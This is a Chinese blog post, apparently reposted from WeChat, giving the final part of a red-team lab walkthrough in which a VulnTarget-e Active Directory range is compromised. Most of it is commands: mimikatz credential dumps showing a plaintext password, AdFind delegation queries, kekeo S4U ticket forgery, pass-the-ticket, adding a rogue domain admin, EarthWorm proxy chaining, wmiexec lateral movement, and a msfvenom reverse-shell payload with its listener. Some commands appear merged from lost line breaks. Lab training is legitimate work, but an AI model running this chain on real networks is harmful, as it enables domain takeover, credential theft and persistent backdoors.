红蓝对抗靶场之内网渗透【四】完结撒花！

admin

102503
文章

87
评论

2023年6月12日09:01:40评论28 views字数 2539阅读8分27秒阅读模式

0x01 前言

红蓝对抗靶场前三篇VulnTarget-e边界主机权限获取【一】，红蓝对抗靶场VulnTarget-e之内网渗透【二】，红蓝对抗靶场之内网渗透【三】。

此篇是最后一篇，内网渗透域内打法。看完文章兄弟们点点赞哈，最近要被文章阅读搞死了

涉及知识点

三级代理约束性委派攻击横向移动

0x02 信息收集

步骤一：开始进行信息收集，上传猕猴桃到Wins08执行抓取到域用户明文密码...

ping vulntarget.com   //10.0.10.10

定位域控

meterpreter > run post/windows/gather/enum_domain

MSF添加路由

use post/multi/manage/autorouteset session 3run

MSF抓取密码

load kiwikiwi_cmd sekurlsa::logonpasswords

Mimikatz

privilege::debug  //提升权限sekurlsa::logonpasswords  //抓取明文密码Domain user:win2008Domain user password:qweASD123

步骤二：上传Adfind程序判断存在非与约束性委派属性的并发现第三台主机上的win2008域账户对第四台主机10.10的CIFS服务存在约束委派...

查询域中配置非约束委派的主机

AdFind.exe -b "DC=vulntarget,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

查询域中配置非约束委派的服务账户

AdFind.exe -b "DC=vulntarget,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

茶渣

AdFind.exe -h 10.0.10.10 -u win2008 -up qweASD123  -b "DC=vulntarget,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

0x03 约束性委派攻击

步骤三：上传kekeo并用请求win2008的TGT接着伪造S4U请求，以administrator用户权限访问受委派的CIFS服务。

请求约束性委派用户的TGT

tgt::ask /user:win2008 /domain:vulntarget.com /password:qweASD123 /ticket:ash.kirbi

伪造S4U请求并访问CIFS服务

tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/WIN-1PV25H8UJPN.vulntarget.com

红蓝对抗靶场之内网渗透【四】完结撒花！

步骤四：利用mimikatz导入S4U2proxy阶段生成的ST并访问域控10.10主机(注意：导入一次ST执行一次命令)

导入ST

privilege::debugkerberos::ptt TGS_Administrator@vulntarget.com@VULNTARGET.COM_cifs~WIN-1PV25H8UJPN.vulntarget.com@VULNTARGET.COM.kirbiexit

执行命令

dir \WIN-1PV25H8UJPN.vulntarget.comC$

步骤五：执行以下命令创建域用户并将其添加到域管理员中，查看用户信息...

net user 4pts 123admiN@ /add /domainnet group "domain admins" 4pts /add /domainnet group "domain admins" /domain

0x04 三级代理

步骤六：这里为了访问到内网域控主机需要挂三级代理...并按照以下操作设置...

边界主机（一层）

外网主机3777端口接收来自攻击机流量，7779接收来自3777端口流量

ew.exe -s lcx_listen -l 3777 -e 7779 -t 1000000

Ubuntu主机（二层）

Ubuntu的7779端口获取外网主机7779端口的流量，3999端口接收7779端口的流量

./ew -s lcx_slave -d 192.168.100.155 -e 7779 -f 192.168.88.102 -g 3999 -t 1000000

Wins08R2主机（三层）

第三台主机代理了来自3999端口的流量

ew.exe -s ssocksd -l 3999 -t 1000000

红蓝对抗靶场之内网渗透【四】完结撒花！

0x05 横向移动

步骤七：使用Impacket 中提供的wmiexec.py工具远程执行，成功上线第四台主机！！！

proxychains python3 wmiexec.py 4pts:123admiN@@10.0.10.10

红蓝对抗靶场之内网渗透【四】完结撒花！

步骤八：生成反向马并上传之Wins08R2，使用以下项目开启HTTP服务并通过PowerShell下载执行

开启监听

msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 10.0.10.9set lport 5555run

生成后门

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.10.9 LPORT=5555 -f exe > inside.exe

上传执行

lput iinside.exe C:iinside.exe

红蓝对抗靶场之内网渗透【四】完结撒花！

步骤九：至此结束，展示下全部靶机合照...

红蓝对抗靶场之内网渗透【四】完结撒花！

0x06 往期精彩

红蓝对抗靶场之内网渗透【三】

红蓝对抗靶场VulnTarget-e之内网渗透【二】

原文始发于微信公众号（李白你好）：红蓝对抗靶场之内网渗透【四】完结撒花！

左青龙
微信扫一扫

右白虎
微信扫一扫

红蓝对抗靶场之内网渗透【四】完结撒花！

使用 Burp 枚举 REST API

fastjson-BCEL不出网打法原理分析

改变content-type类型所触发的csrf

【OSCP】vivifytech

从零开始的Kubernetes攻防

一次js混淆测试记录

OSCP系列靶场-Esay-SunsetNoontide

一万多块奖金的PaaS平台漏洞

OSCP从WEB到内网&&文件上传&&SSH公私钥免密登录&&Cron job提权打靶经验分...

IO攻击之stdout

发表评论

在线咨询

微信